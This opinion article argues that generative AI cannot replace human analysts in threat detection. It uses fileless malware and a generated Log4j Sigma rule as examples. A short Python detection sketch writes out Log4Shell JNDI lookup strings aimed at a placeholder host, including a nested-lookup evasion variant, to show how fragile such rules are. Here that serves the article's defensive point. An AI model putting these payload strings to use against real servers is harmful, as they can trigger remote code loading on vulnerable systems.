Image: Robot hand with a security shield (Pitinan Piyavatin via Alamy Stock)

Cybersecurity is undergoing a transformation with the rise of AI technologies. Daily, new products and features are announced that utilize large language models (LLMs) to enhance the efficiency and precision of security operations. Some experts even speculate about the emergence of fully autonomous Security Operations Centers (SOCs), suggesting that the role of security analysts may soon become obsolete.

But is AI truly on the verge of taking over our threat detection and response capabilities?

While the potential for an AI singularity exists, it is overly simplistic and often misleading to assert that current AI advancements will lead us there. The capabilities of generative AI are indeed remarkable, yet they remain constrained. These systems rely heavily on extensive training data to produce text, images, and music, but their outputs are fundamentally limited to human-created concepts and ideas. Original thought is still beyond their reach.

These limitations stem from the fact that AI systems lack true comprehension of the concepts they manipulate; they merely generate text that resembles their training data. While this might seem impressive, a closer examination reveals that it often amounts to little more than “glorified autocomplete.”

For instance, many LLMs struggle with basic queries such as “How many r’s are there in strawberry?” or “What is the world record for crossing the English Channel entirely on foot?” These examples illustrate that while AI systems can produce responses, they lack genuine understanding. Recognizing that such errors stem from an absence of cognition, not merely from gaps in knowledge, puts them in the proper light.
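The contrast with ordinary, deterministic code is instructive. A minimal Python sketch like the one below answers the letter-counting question exactly, because it operates on the characters themselves rather than on statistical patterns over tokens:

```python
# Deterministic letter counting: the answer is computed, not predicted.
# An LLM typically sees "strawberry" as one or two tokens rather than a
# sequence of characters, which is one reason it can stumble on questions
# like this one.
word = "strawberry"
print(word.lower().count("r"))  # prints 3
```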

So, why are we witnessing so many innovative and useful applications of these technologies? The answer lies in their effectiveness for specific problems where their lack of cognitive ability does not significantly hinder performance. For example, LLMs excel at generating text summaries.

One of the most successful applications of AI in security operations is the generation of textual explanations and summaries of incidents and investigations. LLMs can effectively create search queries or detection code based on human-generated descriptions. However, this is where their capabilities currently plateau.
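As a rough illustration of that division of labor (a sketch of the general pattern, not any particular vendor's implementation), the snippet below assembles alert fields that humans and existing detection logic already produced into a prompt and hands it to a hypothetical llm_complete() helper standing in for whatever chat-completion API an organization actually uses. The model's contribution is purely linguistic.

```python
# Minimal sketch of LLM-assisted incident summarization.
# llm_complete() is a hypothetical stand-in for a real chat-completion API;
# the structured alert data is assumed to come from existing detection logic.

def summarize_incident(alert: dict, llm_complete) -> str:
    prompt = (
        "Summarize the following security alert for a SOC analyst. "
        "Keep it to three sentences and note the affected host and user.\n\n"
        + "\n".join(f"{key}: {value}" for key, value in alert.items())
    )
    return llm_complete(prompt)

example_alert = {
    "rule": "Suspicious PowerShell encoded command",
    "host": "WKSTN-042",
    "user": "jdoe",
    "severity": "high",
}
# summary = summarize_incident(example_alert, llm_complete=my_llm_client)
```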

Threat detection poses a significant challenge for SOCs using LLMs, as it may appear that these models can autonomously generate detection content. For example, I can ask Microsoft Copilot to create a Sigma rule for detecting a Log4j attack. However, a deeper analysis reveals the limitations of AI in this context.

  • When I mention a “Log4j attack,” I am prompting the model to generate content about a well-documented attack. Humans had to identify and understand that attack before the AI could produce relevant content, and there is a time lag between the first attacks in the wild and the human analysis the AI depends on to generate accurate rules. In other words, this is not an unknown attack.

  • The generated rule is generic and based on widely recognized exploitation methods of a known vulnerability. While it may function adequately, it is a fragile approach that can yield as many false positives and negatives as a rule created by an average human analyst, as the simplified sketch after this list illustrates.
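To make that fragility concrete, here is a simplified Python sketch of the kind of pattern such a generated rule typically encodes (my own reduction for illustration, not the Copilot output itself): it flags the well-known ${jndi:...} lookup strings in logged input, yet a trivial nested-lookup obfuscation already slips past it, while a benign log line that merely quotes the string still fires.

```python
import re

# The canonical Log4Shell indicator: a JNDI lookup embedded in logged input.
# Generated and hand-written rules alike are often little more than
# variations on this pattern.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell(log_line: str) -> bool:
    return bool(JNDI_PATTERN.search(log_line))

# Caught: the textbook payload humans have already analyzed and documented.
print(looks_like_log4shell("GET /?x=${jndi:ldap://evil.example/a}"))  # True

# Missed: the same attack with a trivial nested-lookup obfuscation.
print(looks_like_log4shell("GET /?x=${${lower:j}ndi:ldap://evil.example/a}"))  # False

# False positive: a benign log line that merely quotes the indicator.
print(looks_like_log4shell("user searched for '${jndi:ldap://}' remediation docs"))  # True
```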

People are enthusiastic about the capabilities of these new models, asserting that LLMs will soon be able to detect unknown attacks. However, this belief overlooks the inherent limitations of AI technology and the nature of unknown attacks. To grasp these limitations, we can examine the rise of fileless attacks.

Malware detection systems historically focused on files written to disk, employing hooks to analyze data as it was written. But what if we had a highly efficient AI-based analyzer performing this task? Would that signify a flawless anti-malware solution? Not at all. Attackers have adapted their methods to evade detection, utilizing fileless malware that can be injected directly into memory without ever being written to disk. Consequently, our advanced AI would remain oblivious to such malicious code. The assumption that all malware must be written to disk is outdated, and AI systems may fail to monitor the correct locations.
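As a crude illustration of that blind spot, the sketch below uses the Python watchdog package to stand in for a real file-write hook (actual endpoint hooks sit far lower in the stack). Every file written to the watched directory gets handed to the analyzer, while a payload injected directly into a running process's memory never reaches it, by construction.

```python
# Toy illustration of a disk-centric detection model, using the `watchdog`
# package as a stand-in for real kernel-level file-write hooks.
# Anything that never touches disk -- e.g., shellcode injected directly
# into a running process -- is invisible to this monitor by design.
import time

from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer


class FileWriteScanner(FileSystemEventHandler):
    def on_created(self, event):
        if not event.is_directory:
            # Placeholder for an AI-based or signature-based file analyzer.
            print(f"Scanning newly written file: {event.src_path}")


if __name__ == "__main__":
    observer = Observer()
    # Watch the current directory for demonstration purposes.
    observer.schedule(FileWriteScanner(), path=".", recursive=True)
    observer.start()
    try:
        time.sleep(10)
    finally:
        observer.stop()
        observer.join()
```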

Why New Attacks Are Hard to Detect

Intelligent attackers understand how detection systems operate and craft new attacks that evade detection. Attackers exhibit ingenuity at multiple levels, often circumventing our detection capabilities. For instance, an IP network may be thoroughly monitored for traffic, but this becomes irrelevant if a system is compromised via a Bluetooth vulnerability.

No AI system can analyze attack behavior at that level, identify deviations from previous behavior, and devise solutions to address those changes. This remains a task for humans and will continue to be until artificial general intelligence (AGI) is realized.

Know the Limits of AI in the SOC

With any tool, it is crucial to understand its value, its effective applications, and its limitations. While GenAI-based capabilities provide significant advantages for security operations, they are not a cure-all. Organizations must avoid extending these tools beyond their strengths, as doing so may lead to disappointing and potentially harmful outcomes.

About the Author

Augusto Barros

Cyber-Security Evangelist, Securonix

Augusto Barros is a seasoned security professional, currently serving as VP Cyber Security Evangelist at Securonix. In this role, he strategically delivers top-tier threat detection and response solutions. He assists clients worldwide in leveraging the latest SIEM advancements with best-in-class analytics to mitigate cyber threats and optimize ROI. Prior to joining Securonix, he spent five years as a research analyst at Gartner, engaging with numerous clients and vendors regarding their security operations challenges and solutions. His previous roles include security positions at CIBC and Finastra.